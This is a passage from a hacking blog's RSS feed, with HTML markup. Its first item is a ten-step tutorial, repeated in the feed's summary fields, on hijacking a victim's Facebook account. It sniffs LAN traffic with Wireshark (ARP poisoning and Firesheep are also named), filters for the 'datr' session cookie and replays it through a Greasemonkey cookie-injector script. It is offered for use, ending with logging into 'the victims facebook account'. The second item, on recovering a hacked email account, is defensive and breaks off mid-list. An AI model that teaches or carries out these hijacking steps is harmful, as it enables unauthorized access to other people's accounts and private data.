&lt;li style="background-attachment: scroll; background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVpXM_fw9sGABT2H4WInNdogZVuhyphenhyphenHxwyW3cSFQnVXd09ujqm20JdW3W9Z7-XwVQFo75B1Auou3SlCHY8pZS6_wyZ6EeTtks5pOVSk63V4Yqy_fJJj7_1HdjMTMUdo13RBMbj80wWHH0wE/s320/143.gif); background-position: 0px 4px; background-repeat: no-repeat no-repeat; line-height: 1.4em; margin: 0.3em 0px; padding: 0px 0px 0.8em 20px;"&gt;&lt;b&gt;&lt;a href="http://www.rafayhackingarticles.net/2011/06/gmail-cookie-stealing-and-session_26.html" style="background-color: white; border: none; color: #666666; text-decoration: none;"&gt;Gmail Cookie Stealing And Session Hijacking Part 2&lt;/a&gt;&lt;/b&gt;&lt;/li&gt;
&lt;li style="background-attachment: scroll; background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVpXM_fw9sGABT2H4WInNdogZVuhyphenhyphenHxwyW3cSFQnVXd09ujqm20JdW3W9Z7-XwVQFo75B1Auou3SlCHY8pZS6_wyZ6EeTtks5pOVSk63V4Yqy_fJJj7_1HdjMTMUdo13RBMbj80wWHH0wE/s320/143.gif); background-position: 0px 4px; background-repeat: no-repeat no-repeat; line-height: 1.4em; margin: 0.3em 0px; padding: 0px 0px 0.8em 20px;"&gt;&lt;b&gt;&lt;a href="http://www.rafayhackingarticles.net/2011/07/gmail-cookie-stealing-and-session.html" style="background-color: white; border: none; color: #666666; text-decoration: none;"&gt;Gmail Cookie Stealing And Session Hijacking Part 3&lt;/a&gt;&lt;/b&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;h4 style="border-bottom-color: rgb(164, 111, 56); border-bottom-style: solid; border-bottom-width: 1px; border-top-color: rgb(164, 111, 56); border-top-style: solid; border-top-width: 1px; color: #a46f38; font-family: Verdana; font-size: 12px; line-height: 19.1875px; padding: 3px;"&gt;
&lt;b style="background-color: white;"&gt;Facebook Authentication Cookies&lt;/b&gt;&lt;/h4&gt;
&lt;span style="background-color: white;"&gt;&lt;span style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;The cookie which facebook uses to authenticate it's users is called&amp;nbsp;&lt;/span&gt;&lt;b style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;"Datr"&lt;/b&gt;&lt;span style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;, If an attacker can get hold of your authentication cookies, All he needs to do is to inject those cookies in his browser and he will gain&amp;nbsp;access&amp;nbsp;to your account. This is how a facebook authentication cookie looks like:&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;blockquote style="border: 4px solid rgb(236, 234, 234); color: #b5804b; font-family: Helvetica, Arial; font-size: 12px; font-weight: bold; line-height: 1.3em; margin: 0px 20px; padding: 10px;"&gt;
&lt;b style="background-color: white;"&gt;Cookie: datr=1276721606-b7f94f977295759399293c5b0767618dc02111ede159a827030fc;&lt;/b&gt;&lt;/blockquote&gt;
&lt;span style="background-color: white;"&gt;&lt;br style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;" /&gt;
&lt;b style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;How To Steal Facebook Session Cookies And Hijack An Account?&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: white;"&gt;&lt;br style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;" /&gt;
&lt;span style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;An attacker can use variety of methods in order to steal your facebook authentication cookies depending upon the network he is on, If an attacker is on a hub based network he would just sniff traffic with any packet sniffer and gain&amp;nbsp;access&amp;nbsp;to victims account.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: white;"&gt;&lt;br style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;" /&gt;
&lt;span style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;If an attacker is on a Switch based network he would use an ARP Poisoning request to capture authentication cookies, If an attacker is on a wireless network he just needs to use a simple tool called firesheep in order to capture authentication cookie and gain&amp;nbsp;access&amp;nbsp;to victims account.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: white;"&gt;&lt;br style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;" /&gt;
&lt;span style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;In the example below I will be explaining how an attacker can capture your authentication cookies and hack your facebook account with wireshark.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: white;"&gt;&lt;br style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;" /&gt;
&lt;b style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;Step 1 -&lt;/b&gt;&lt;span style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;&amp;nbsp;First of all download wireshark from the official website and install it.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: white;"&gt;&lt;br style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;" /&gt;
&lt;b style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;Step 2 -&lt;/b&gt;&lt;span style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;&amp;nbsp;Next open up wireshark click on analyze and then click on interfaces.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: white;"&gt;&lt;br style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;" /&gt;
&lt;b style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;Step 3 -&amp;nbsp;&lt;/b&gt;&lt;span style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;Next choose the appropriate interface and click on start.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: white;"&gt;&lt;br style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;" /&gt;
&lt;span class="Apple-style-span" style="color: #a46f38; font-family: Verdana; font-size: 12px; line-height: 20px;"&gt;&lt;img border="0" height="249" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTEUOfHjwheHJSqtOArAEUowTYH9BhTJXxok3LDfAyaRjU6K4WX31bNbveXq3poy_uJiR8PRb09elKxPSTD5j6KCVo3TH2QQyKoK4XWR8hpb3tnC1QJ1Z8eDDHjW9QH60rQEJNJ4eTLrg/s640/Untitled.png" style="border-width: 0px; padding: 10px;" width="577" /&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: white;"&gt;&lt;span class="Apple-style-span" style="color: #a46f38; font-family: Verdana; font-size: 12px; line-height: 20px;"&gt;&lt;b&gt;&lt;br /&gt;&lt;/b&gt;&lt;/span&gt;
&lt;b style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;Step 4 -&lt;/b&gt;&lt;span style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;&amp;nbsp;Continue sniffing for around 10 minutes.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: white;"&gt;&lt;br style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;" /&gt;
&lt;b style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;Step 5 -&amp;nbsp;&lt;/b&gt;&lt;span style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;After 10minutes stop the packet sniffing by going to the capture menu and clicking on Stop.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: white;"&gt;&lt;br style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;" /&gt;
&lt;b style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;Step 6 -&lt;/b&gt;&lt;span style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;&amp;nbsp;Next set the filter to&amp;nbsp;&lt;/span&gt;&lt;b style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;http.cookie contains “datr”&lt;/b&gt;&lt;span style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;&amp;nbsp;at top left, This filter will search for all the http cookies with the name datr, And datr as we know is the name of the facebook authentication cookie.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: white;"&gt;&lt;br style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;" /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5btzrD41dEbUNx6XBIS8CaVI-SZw4OPkHSVPUbOBfwHRCNAvyqdLSPlJ7B20lwT7KDLXcPdOXqQbrC-3MgEfOPQ8CP2eqY1AAF8WPyR4cP3Ui5hG9RQdx-lpEDCiycVLkf4no_T6x-EM/s1600/Auth+1.png" imageanchor="1" style="background-color: white; border: none; color: #666666; margin-left: 1em; margin-right: 1em; text-decoration: none;"&gt;&lt;img border="0" height="352" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh5btzrD41dEbUNx6XBIS8CaVI-SZw4OPkHSVPUbOBfwHRCNAvyqdLSPlJ7B20lwT7KDLXcPdOXqQbrC-3MgEfOPQ8CP2eqY1AAF8WPyR4cP3Ui5hG9RQdx-lpEDCiycVLkf4no_T6x-EM/s640/Auth+1.png" style="border-width: 0px; padding: 10px;" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="background-color: white;"&gt;&lt;br style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;" /&gt;
&lt;b style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;Step 7 -&amp;nbsp;&lt;/b&gt;&lt;span style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;&amp;nbsp;Next right click on it and goto&amp;nbsp;&lt;/span&gt;&lt;b style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;Copy - Bytes - Printable Text only&lt;/b&gt;&lt;span style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: white;"&gt;&lt;br style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;" /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_sgsFDjnA5srf_4IJ8fsgFONfuRvFpqwmvghXNGulUyrDQdIE7NukwyVrW8NXqzIlvDvUMN8r3QNYFVfpSx82GMSKJe8a2hjWsJHoO2XH245wDbML4fEriozf5xezz7zjrO04FhdbKmQ/s1600/2.png" imageanchor="1" style="background-color: white; border: none; color: #666666; margin-left: 1em; margin-right: 1em; text-decoration: none;"&gt;&lt;img border="0" height="544" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_sgsFDjnA5srf_4IJ8fsgFONfuRvFpqwmvghXNGulUyrDQdIE7NukwyVrW8NXqzIlvDvUMN8r3QNYFVfpSx82GMSKJe8a2hjWsJHoO2XH245wDbML4fEriozf5xezz7zjrO04FhdbKmQ/s640/2.png" style="border-width: 0px; padding: 10px;" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="background-color: white;"&gt;&lt;br style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;" /&gt;
&lt;b style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;Step 8 -&amp;nbsp;&lt;/b&gt;&lt;span style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;Next you’ll want to open up firefox. You’ll need both&amp;nbsp;&lt;/span&gt;&lt;b style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;&lt;a href="https://addons.mozilla.org/en-US/firefox/addon/748/" style="border: none; color: #666666; text-decoration: none;"&gt;Greasemonkey&lt;/a&gt;&lt;/b&gt;&lt;span style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;&amp;nbsp;and the&lt;/span&gt;&lt;b style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;&lt;a href="http://dustint.com/code/cookieinjector.user.js" style="border: none; color: #666666; text-decoration: none;"&gt;cookieinjector script&lt;/a&gt;&lt;/b&gt;&lt;span style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;. Now open up Facebook.com and make sure that you are not logged in.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: white;"&gt;&lt;br style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;" /&gt;
&lt;b style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;Step 9-&lt;/b&gt;&lt;span style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;&amp;nbsp;Press&amp;nbsp;&lt;/span&gt;&lt;b style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;Alt C&lt;/b&gt;&lt;span style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;&amp;nbsp;to bring up the cookie injector, Simply paste in the cookie value into it.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: white;"&gt;&lt;br style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;" /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIwfsVoPd4r4iBkkk9NYz1S4yW3gp_6ILL99L8hX7yNqOfwQR7uy0XrhKhxfEbq1L7SUAGI0GmXznQq7ykeAycOmOVis8qpWwIzzxhcb2KUg6Bgsj5JTJkAu9TK-_rAuWjgtn43E53xMk/s1600/facebook+cookie.png" imageanchor="1" style="background-color: white; border: none; color: #666666; margin-left: 1em; margin-right: 1em; text-decoration: none;"&gt;&lt;img border="0" height="390" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIwfsVoPd4r4iBkkk9NYz1S4yW3gp_6ILL99L8hX7yNqOfwQR7uy0XrhKhxfEbq1L7SUAGI0GmXznQq7ykeAycOmOVis8qpWwIzzxhcb2KUg6Bgsj5JTJkAu9TK-_rAuWjgtn43E53xMk/s640/facebook+cookie.png" style="border-width: 0px; padding: 10px;" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="background-color: white;"&gt;&lt;br style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;" /&gt;
&lt;b style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;Step 10 -&lt;/b&gt;&lt;span style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;&amp;nbsp;Now refresh your page and viola you are logged in to the victims facebook account.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6zT4dPEBfgsxYCjiZricjnZDqCQqxBS-jM2SW2yzO6aPNpS3ZBA0K8wCwwH89uVO3zEWYy-WAvuu1lN_2ISvjsWK6W8WgFjrMXwWObOmPkr_aVdKX18MqA_rJxLsQ3A4Jhsza0nbiuo0/s72-c/How-to-hack-Facebook.jpg" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">3</thr:total><enclosure length="-1" type="application/javascript" url="http://dustint.com/code/cookieinjector.user.js"/><itunes:explicit>no</itunes:explicit><itunes:subtitle>Facebook Cookie Stealing And Session Hijacking Three days ago I finished the series on&amp;nbsp;Gmail Session Hijacking and Cookie Stealing&amp;nbsp;, due to a tremendous response of readers I planned to write a post on Facebook cookie stealing and Session hijacking. Facebook session hijacking can also be accomplished via a very popular tool called Firesheep(On a Wifi Network Only), which I won't be explaining here because I have already written it before in my post&amp;nbsp;Facebook Hacking Made Easy With Firesheep In this tutorial I will explain you how an attacker can capture your authentication cookies on a local area network and use them to&amp;nbsp;hack your facebook account, &amp;nbsp;Before reading this tutorial I would recommend you to &amp;nbsp;part1, part2 and part 3 of my&amp;nbsp;Gmail Session Hijacking and Cookie stealing series, So you could have better understanding of what I am doing here. Gmail Cookie Stealing And Session Hijacking Part 1 Gmail Cookie Stealing And Session Hijacking Part 2 Gmail Cookie Stealing And Session Hijacking Part 3 Facebook Authentication Cookies The cookie which facebook uses to authenticate it's users is called&amp;nbsp;"Datr", If an attacker can get hold of your authentication cookies, All he needs to do is to inject those cookies in his browser and he will gain&amp;nbsp;access&amp;nbsp;to your account. This is how a facebook authentication cookie looks like: Cookie: datr=1276721606-b7f94f977295759399293c5b0767618dc02111ede159a827030fc; How To Steal Facebook Session Cookies And Hijack An Account?&amp;nbsp; An attacker can use variety of methods in order to steal your facebook authentication cookies depending upon the network he is on, If an attacker is on a hub based network he would just sniff traffic with any packet sniffer and gain&amp;nbsp;access&amp;nbsp;to victims account. If an attacker is on a Switch based network he would use an ARP Poisoning request to capture authentication cookies, If an attacker is on a wireless network he just needs to use a simple tool called firesheep in order to capture authentication cookie and gain&amp;nbsp;access&amp;nbsp;to victims account. In the example below I will be explaining how an attacker can capture your authentication cookies and hack your facebook account with wireshark. Step 1 -&amp;nbsp;First of all download wireshark from the official website and install it. Step 2 -&amp;nbsp;Next open up wireshark click on analyze and then click on interfaces. Step 3 -&amp;nbsp;Next choose the appropriate interface and click on start. Step 4 -&amp;nbsp;Continue sniffing for around 10 minutes. Step 5 -&amp;nbsp;After 10minutes stop the packet sniffing by going to the capture menu and clicking on Stop. Step 6 -&amp;nbsp;Next set the filter to&amp;nbsp;http.cookie contains “datr”&amp;nbsp;at top left, This filter will search for all the http cookies with the name datr, And datr as we know is the name of the facebook authentication cookie. Step 7 -&amp;nbsp;&amp;nbsp;Next right click on it and goto&amp;nbsp;Copy - Bytes - Printable Text only. Step 8 -&amp;nbsp;Next you’ll want to open up firefox. You’ll need both&amp;nbsp;Greasemonkey&amp;nbsp;and thecookieinjector script. Now open up Facebook.com and make sure that you are not logged in. Step 9-&amp;nbsp;Press&amp;nbsp;Alt C&amp;nbsp;to bring up the cookie injector, Simply paste in the cookie value into it. Step 10 -&amp;nbsp;Now refresh your page and viola you are logged in to the victims facebook account.</itunes:subtitle><itunes:author>noreply@blogger.com (Anonymous)</itunes:author><itunes:summary>Facebook Cookie Stealing And Session Hijacking Three days ago I finished the series on&amp;nbsp;Gmail Session Hijacking and Cookie Stealing&amp;nbsp;, due to a tremendous response of readers I planned to write a post on Facebook cookie stealing and Session hijacking. Facebook session hijacking can also be accomplished via a very popular tool called Firesheep(On a Wifi Network Only), which I won't be explaining here because I have already written it before in my post&amp;nbsp;Facebook Hacking Made Easy With Firesheep In this tutorial I will explain you how an attacker can capture your authentication cookies on a local area network and use them to&amp;nbsp;hack your facebook account, &amp;nbsp;Before reading this tutorial I would recommend you to &amp;nbsp;part1, part2 and part 3 of my&amp;nbsp;Gmail Session Hijacking and Cookie stealing series, So you could have better understanding of what I am doing here. Gmail Cookie Stealing And Session Hijacking Part 1 Gmail Cookie Stealing And Session Hijacking Part 2 Gmail Cookie Stealing And Session Hijacking Part 3 Facebook Authentication Cookies The cookie which facebook uses to authenticate it's users is called&amp;nbsp;"Datr", If an attacker can get hold of your authentication cookies, All he needs to do is to inject those cookies in his browser and he will gain&amp;nbsp;access&amp;nbsp;to your account. This is how a facebook authentication cookie looks like: Cookie: datr=1276721606-b7f94f977295759399293c5b0767618dc02111ede159a827030fc; How To Steal Facebook Session Cookies And Hijack An Account?&amp;nbsp; An attacker can use variety of methods in order to steal your facebook authentication cookies depending upon the network he is on, If an attacker is on a hub based network he would just sniff traffic with any packet sniffer and gain&amp;nbsp;access&amp;nbsp;to victims account. If an attacker is on a Switch based network he would use an ARP Poisoning request to capture authentication cookies, If an attacker is on a wireless network he just needs to use a simple tool called firesheep in order to capture authentication cookie and gain&amp;nbsp;access&amp;nbsp;to victims account. In the example below I will be explaining how an attacker can capture your authentication cookies and hack your facebook account with wireshark. Step 1 -&amp;nbsp;First of all download wireshark from the official website and install it. Step 2 -&amp;nbsp;Next open up wireshark click on analyze and then click on interfaces. Step 3 -&amp;nbsp;Next choose the appropriate interface and click on start. Step 4 -&amp;nbsp;Continue sniffing for around 10 minutes. Step 5 -&amp;nbsp;After 10minutes stop the packet sniffing by going to the capture menu and clicking on Stop. Step 6 -&amp;nbsp;Next set the filter to&amp;nbsp;http.cookie contains “datr”&amp;nbsp;at top left, This filter will search for all the http cookies with the name datr, And datr as we know is the name of the facebook authentication cookie. Step 7 -&amp;nbsp;&amp;nbsp;Next right click on it and goto&amp;nbsp;Copy - Bytes - Printable Text only. Step 8 -&amp;nbsp;Next you’ll want to open up firefox. You’ll need both&amp;nbsp;Greasemonkey&amp;nbsp;and thecookieinjector script. Now open up Facebook.com and make sure that you are not logged in. Step 9-&amp;nbsp;Press&amp;nbsp;Alt C&amp;nbsp;to bring up the cookie injector, Simply paste in the cookie value into it. Step 10 -&amp;nbsp;Now refresh your page and viola you are logged in to the victims facebook account.</itunes:summary><itunes:keywords>HaCkinG</itunes:keywords></item><item><title>What to Do When Your Email Account is Hacked?</title><link>https://snacksofhacks.blogspot.com/2013/01/what-to-do-when-your-email-account-is.html</link><category>HaCkinG</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Wed, 9 Jan 2013 17:23:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-3441350317927969357.post-7810649542242477560</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigd7AUaYygJTiZ-lR20SQ3XxyCeTGi77xrDWWNuWz7F3_yDhzWpkFlmP79jaDefScppZ_vv9t_fTEpw2Mf5FINDAfQFP9zQh9AWNT93LYCjtj4FUTYOE_byymDfkCPINvFpCRfS0GCZ4g/s1600/email-security-concept-700px.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" data-original-height="370" data-original-width="700" height="211" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigd7AUaYygJTiZ-lR20SQ3XxyCeTGi77xrDWWNuWz7F3_yDhzWpkFlmP79jaDefScppZ_vv9t_fTEpw2Mf5FINDAfQFP9zQh9AWNT93LYCjtj4FUTYOE_byymDfkCPINvFpCRfS0GCZ4g/s400/email-security-concept-700px.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span style="font-family: arial, verdana, sans-serif; font-size: large; line-height: 1.7em; text-align: justify;"&gt;&lt;b&gt;I&lt;/b&gt;&lt;/span&gt;&lt;span style="font-family: arial, verdana, sans-serif; line-height: 1.7em; text-align: justify;"&gt;t can be a real nightmare if someone hacks and&amp;nbsp;takes control of your email account&amp;nbsp;as it may contain confidential information like bank logins, credit card details and other sensitive data. If you are one such Internet user whose email account has been compromised, then this post will surely help you out.&lt;/span&gt;&lt;br /&gt;
&lt;div class="entry" style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; font-family: Arial, Verdana, sans-serif; line-height: 1.7em; margin: 0px 0px 20px; outline: 0px; padding: 0px; vertical-align: baseline; z-index: 971;"&gt;
&lt;h3 style="text-align: left;"&gt;
&lt;span style="font-size: small; font-weight: normal;"&gt;
In this post, you will find the best possible ways to get back&amp;nbsp;your hacked email account.&lt;/span&gt;&lt;/h3&gt;
&lt;h3 style="background-attachment: scroll; background-image: none; background-position: 0px 0px; border: 0px; font-family: &amp;quot;open sans&amp;quot;, arial, sans-serif; margin: 0px 0px 0.9em; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;
&lt;span style="font-size: small;"&gt;
For Gmail:&lt;/span&gt;&lt;/h3&gt;
&lt;div style="background-attachment: scroll; background-image: none; background-position: 0px 0px; border: 0px; line-height: 1.7em; margin-bottom: 1.6em; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;
It can be a big disaster if your Gmail account has been compromised as&amp;nbsp;it may&amp;nbsp;be associated with&amp;nbsp;several services like Blogger, Analytics, Adwords, Adsense, Orkut etc. Losing access to your Gmail account means losing access to all the services associated it with too. Here is a list of possible recovery actions that you can try.&lt;/div&gt;
&lt;div style="background-attachment: scroll; background-image: none; background-position: 0px 0px; border: 0px; line-height: 1.7em; margin-bottom: 1.6em; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;
&lt;strong style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;Step-1:&lt;/strong&gt;&amp;nbsp;Try resetting your password! This is the first step and probably the easiest way to get your account back in action. In this process, Google may ask you to&amp;nbsp;answer&amp;nbsp;the secret question or may send the&amp;nbsp;password reset details&amp;nbsp;to&amp;nbsp;the secondary email address associated with&amp;nbsp;your compromised account. You can reset you password from the following link&lt;/div&gt;
&lt;div class="alertBox-info" style="background-attachment: scroll; background-color: #d1eefb; background-image: none; background-position: 0px 0px; border-radius: 4px; border: 0px; clear: both; color: #467b9e; line-height: 1.6em; margin: 0px 0px 35px; outline: 0px; padding: 0px; vertical-align: baseline; z-index: 970;"&gt;
&lt;div style="background-attachment: scroll; background-color: transparent; background-image: url(https://www.gohacking.com/wp-content/themes/GoHacking-2012/i/information.png); background-position: 20px 50%; background-repeat: no-repeat no-repeat; border-bottom-left-radius: 4px; border-bottom-right-radius: 4px; border-top-left-radius: 4px; border-top-right-radius: 4px; border: 0px solid; clear: both; margin: 0px 0px 0pt; outline: 0px; padding: 10px 10px 10px 55px; vertical-align: baseline; z-index: 969;"&gt;
&lt;a href="https://www.google.com/accounts/ForgotPasswd" rel="nofollow" style="-webkit-transition: all 0.2s; background-attachment: scroll; background-color: transparent; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; color: #0060a6; font-weight: bold; margin: 0px; outline: 0px; padding: 0px; text-decoration: none; vertical-align: baseline;" target="_blank"&gt;&lt;span style="font-size: small;"&gt;Gmail Password Reset Link&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style="background-attachment: scroll; background-image: none; background-position: 0px 0px; border: 0px; line-height: 1.7em; margin-bottom: 1.6em; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;
&lt;strong style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;Update:&lt;/strong&gt;&lt;/div&gt;
&lt;div style="background-attachment: scroll; background-image: none; background-position: 0px 0px; border: 0px; line-height: 1.7em; margin-bottom: 1.6em; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;
Gmail has now introduced a new feature wherein it is possible to reset your password using your mobile number. Once the reset process is initiated, Gmail will send new login details to your mobile number itself.&lt;/div&gt;
&lt;div style="background-attachment: scroll; background-image: none; background-position: 0px 0px; border: 0px; line-height: 1.7em; margin-bottom: 1.6em; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;
If you cannot find success from the Step-1, then proceed to Step-2.&lt;/div&gt;
&lt;div style="background-attachment: scroll; background-image: none; background-position: 0px 0px; border: 0px; line-height: 1.7em; margin-bottom: 1.6em; outline: 0px; padding: 0px; text-align: justify; vertical-align: baseline;"&gt;
&lt;strong style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;Step-2:&lt;/strong&gt;&amp;nbsp;Many times&amp;nbsp;the hacker&amp;nbsp;will change the secret question and the secondary email address&amp;nbsp;right after the account is compromised. This is the reason&amp;nbsp;for&amp;nbsp;the&amp;nbsp;&lt;em style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;password reset process&lt;/em&gt;&amp;nbsp;to fail. If this is the case, then you need to contact the Gmail support team by filling out the account recovery form. This form will ask you to fill out several questions like:&lt;/div&gt;
&lt;ol style="background-attachment: scroll; background-image: none; background-position: 0px 0px; border: 0px; margin: 0px 0px 1.625em 2.5em; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;
&lt;li style="background-attachment: scroll; background-image: none; background-position: 0px 0px; background-repeat: repeat repeat; border: 0px; margin: 0px; outline: 0px; padding: 0px; vertical-align: baseline;"&gt;Email addresses of up to five frequently emailed contacts&lt;/li&gt;
